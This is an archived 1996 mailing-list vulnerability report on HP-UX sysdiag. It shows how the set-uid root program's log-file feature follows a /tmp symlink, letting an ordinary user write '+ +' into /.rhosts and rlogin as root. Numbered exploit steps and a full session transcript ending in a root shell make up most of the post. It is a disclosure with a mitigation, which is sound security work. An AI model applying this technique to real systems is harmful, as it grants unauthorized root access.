Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: HP/UX :: hpux_sys.txt

Vulnerability in HP sysdiag?





                         Vunerability in HP sysdiag ?
                                       
   John W. Jacobi (jjacobi@pop500.gsfc.nasa.gov)
   Sat, 21 Sep 1996 23:56:42 -0700
   
Hi all,

If this is out, I apologize.

Subject: Vunerability in HP sysdiag ???

Program and Systems that I did this on:
        The sysdiag program on
           HP 9000/700/HPUX9.05 (has PHSS_7587)
           HP 9000/800/HPUX9.04 (not sure of patch regarding diags)

To Prevent:
        For now, turn off the set uid on the programs involved.

This is how it worked for me, perhaps you too:

Problem:

        Basically, the sysdiag stuff is set-uid root.  You can exploit that
feature to create and write stuff to arbitrary files on the system as
root,
while not being root.  If the target file you want to create exists,
this
doesn't work.  Perhaps there is a way around that, but that ain't the
point.
The point is that I used this to get root in 30 seconds on my HP's and
that's
not good.  Heck, this is probably faster then asking for the root
password !!!

More on the problem:

        What happens is that a feature exists to create a log file of your
sysdiag session that can be invoked while in the program.  You give it
the
name of the file to create, and if it is a sym link to a non-existant
file,
sysdiag follows the sym link and creates the file as root for you and
logs
your session in it.  To show a typical vunerability, I created /.rhosts
from a sym link in /tmp that sysdiag followed and then caused sysdiag
to
echo the line "+ +" in to the file.  Then I could rlogin as root.

        If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick
to create and put a "+ +" in either of those files.  That's an easy way
to
become root or someone else. You can do other files as well.  This
ain't
cool, at all...

How I  tested this on my system:

1. I logged in with my regular account
2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
3. I ran the command: /bin/sysdiag
4. From the DUI> prompt I typed: outfile /tmp/f1
5. From the DUI> prompt I typed: + +
6. From the DUI> prompt I typed: redo
7. When my previous command echoed to the screen I pressed <return>.
8. From the DUI> prompt I typed: exit
9. Now at the shell prompt, and out of sysdiag, I typed:
        rlogin localhost -l root
10. Once logged in I typed: id
        and it said I was root...

This is the script of my sysdiag session:

Script started on Sat Sep 21 23:29:10 1996
$ id
uid=1648(jjacobi) gid=999(systems)
$ ls -l /tmp
total 0
$ ls -l /.rhosts
/.rhosts not found
$ ln -s /.rhosts /tmp/tempfile
$ ls -l /tmp
total 2
lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile ->
/.rhosts
$ ls -l /.rhosts
/.rhosts not found
$ /bin/sysdiag
*****************************************************************
******                                                     ******
******               ONLINE DIAGNOSTIC SYSTEM              ******
******                                                     ******
******          (C) Copyright Hewlett Packard Co.          ******
******               1987, 1989, 1990, 1992                ******
******                 All Rights Reserved                 ******
******                                                     ******
******              DUI Version A.02.24                    ******
******         Diagnostic Monitor Version   A.02.19        ******
******                                                     ******
*****************************************************************

    Type "HELP" for assistance.

DUI >outfile /tmp/tempfile
DUI >+ +
     ^
*** SYNTAX ERROR (DUISERR 501)

DUI >redo
+ +

DUI >+ +
     ^
*** SYNTAX ERROR (DUISERR 501)

DUI >exit
$ ls -l /tmp
total 2
lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile ->
/.rhosts
$ ls -l /.rhosts
-rw-------   1 root     systems      891 Sep 21 23:29 /.rhosts
$ id
uid=1648(jjacobi) gid=999(systems)
$ rlogin localhost -l root
Please wait...checking for disk quotas

Value of TERM has been set to "vt100".
# id
uid=0(root) gid=3(sys)
# cat /.rhosts
DUI >+
+

^
*** SYNTAX ERROR (DUISERR
501)

DUI
>redo
+
+
DUI >+
+

^
*** SYNTAX ERROR (DUISERR
501)

DUI
>exit
# exit
logout root
Connection closed.
$ id
uid=1648(jjacobi) gid=999(systems)
$ exit

script done on Sat Sep 21 23:30:38 1996



You have reached the end of my message, thank you for reading it.

John W. Jacobi



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH